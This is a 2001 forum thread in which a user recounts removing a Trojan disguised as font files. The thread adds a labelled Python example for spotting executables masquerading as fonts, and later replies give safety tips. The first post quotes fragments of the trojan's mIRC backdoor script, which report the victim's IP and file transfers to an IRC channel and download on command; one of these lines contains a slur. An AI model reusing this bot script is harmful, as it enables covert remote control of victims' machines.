Mail Art Not War!

Re: Friendly warning - hard to kill

kiyotei
Friendly warning - hard to kill
June 01, 2001 10:33AM
I know what I am doing.
I have been online for a while.
I always follow good computer safety.
Yeah right!

Just a little note to remind you all to NEVER run any programs you get as an email attachment or download from the newsgroups.

I just spent 2 days trying to clean up a Trojan virus I got from a newsgroup download. Was supposed to be an MP3 program.

I ran it without virus checking it first - DOH!
I know better.

It was an especially nasty program called Backdoor G-22 that even McAfee Virus Scan and Norton wouldn't kill. I had to go into my registry and remove all the little bits and pieces of code lying around. It created an "Explorer.exe" and hid it in my Windows\Fonts\ folders. Some of the virus files were disguised as font files like courier.ttf, fonts.ttf, etc.

I finally killed the sucker - but it took a while to figure out all its tricks.

Here is some of the text it writes to your .INI files:

n179= if ($exists(task.exe) == $false) { remini script.ini | remini mirc.ini | notice %connect.chan Oh Shiiiiiiiiiiiit deltree this fucker $ip | halt }
n180= run task.exe /n /fh taskmon
n186=on 1:DISCONNECT: { timermakesureconnect 0 20
n188=on *:FILESENT:*.*: {
n189= if (%connect.chan != %mp3channel ) { /notice %connect.chan 4,0Filesent to $nick , $filename, $address, $time Hehe :) }
n191=on *:FILERCVD:*.*: { /notice %connect.chan 4,0 Filerecieved from $nick , $nopath($filename) , $address, $time $+ . I think its a virus the damn fag }
n192=#####################BACKUP IF I AM KLINED##########################
n193=on *:TEXT:*:*:{
n194= if ($1 == get new variables) { download | msg $nick hi | timergetinserver 1 20 server %server }

I love the little "Hehe :) }" hidden in there!

Death to viruses!

Practice safe computer sex. Don't let your guard down - and always scan all programs that you get from the net BEFORE you run them.

Take care artisans
kiyotei
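
The hiding trick described in the post above (an Explorer.exe parked in Windows\Fonts and executables named like courier.ttf) can be caught by comparing each file's leading bytes with its extension. This is an added example, not part of the original thread; the function names and the sample files are constructed for illustration.

```python
import os
import tempfile

# Leading bytes of genuine font containers (sfnt-based formats).
FONT_MAGICS = {
    ".ttf": (b"\x00\x01\x00\x00", b"true", b"OTTO"),
    ".otf": (b"OTTO", b"\x00\x01\x00\x00"),
    ".ttc": (b"ttcf",),
}
# Extensions that have no business sitting in a fonts folder.
PROGRAM_EXTS = {".exe", ".com", ".scr", ".pif", ".bat", ".vbs"}


def audit_fonts_dir(root):
    """Return sorted (relative_path, reason) pairs for suspicious files under root."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            ext = os.path.splitext(name)[1].lower()
            with open(path, "rb") as fh:
                head = fh.read(4)
            rel = os.path.relpath(path, root)
            if ext in PROGRAM_EXTS:
                findings.append((rel, "program file in fonts folder"))
            elif ext in FONT_MAGICS and not head.startswith(FONT_MAGICS[ext]):
                kind = "DOS/Windows executable" if head[:2] == b"MZ" else "not a font"
                findings.append((rel, f"{ext} extension but content is {kind}"))
    return sorted(findings)


def build_sample(root):
    """Constructed sample data: one plausible font header and two impostors."""
    samples = {
        "arial.ttf": b"\x00\x01\x00\x00" + b"\x00" * 12,  # valid TrueType magic
        "courier.ttf": b"MZ\x90\x00" + b"\x00" * 12,      # executable header, font name
        "Explorer.exe": b"MZ\x90\x00" + b"\x00" * 12,     # program parked among fonts
    }
    for name, data in samples.items():
        with open(os.path.join(root, name), "wb") as fh:
            fh.write(data)


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample(tmp)
        for rel, reason in audit_fonts_dir(tmp):
            print(f"{rel}: {reason}")
```

Legitimate .fon bitmap fonts also start with an MZ header, which is why the check is limited to the sfnt extensions listed in FONT_MAGICS.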
Merlin
Re: slow down please!!!
June 03, 2001 12:03AM
report problems by e-mail .-------- and..........

something happens, together we'll find the best solution!

however - I'd been infected by viruses too mostly it had
been hard or software-problems, if not - we'll find the way to
delete the illness

your

Merlin
kiyotei
Re: slow down please!!!
June 03, 2001 01:27AM
It's done.

Trojan (virus) is dead. System is 100% bug-free.

Using a great firewall now - Free for personal use:
check it out - Zone Alarm [www.zonelabs.com]

Thanx for the offer of help.

Your eBro -kiyotei
Merlin
Re: Friendly warning - hard to kill
June 12, 2001 07:25PM
Never open attachments (mail and news is the same) with the ending
*.exe *.jpeg.vbs etc.....

run it in the safe sandbox - reading the source code of it first!
While not opening/running it by windows!

so you will see what is in it - also word and office macros are a
real problem once one made some of my computers "hard disc c:
not found"...

Yes I am using ZoneAlarm too since some years - good program
against bombing and sniffing, but - it seems to send back data
to the software producer like realplayer, being called a kind of
Trojan too...

apal